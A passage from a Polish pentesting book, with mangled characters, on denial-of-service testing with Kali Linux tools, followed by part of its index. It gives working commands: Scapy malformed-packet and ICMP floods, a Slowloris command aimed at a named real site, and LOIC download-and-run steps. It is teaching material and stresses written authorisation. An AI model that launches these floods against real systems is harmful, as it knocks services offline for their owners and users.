Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

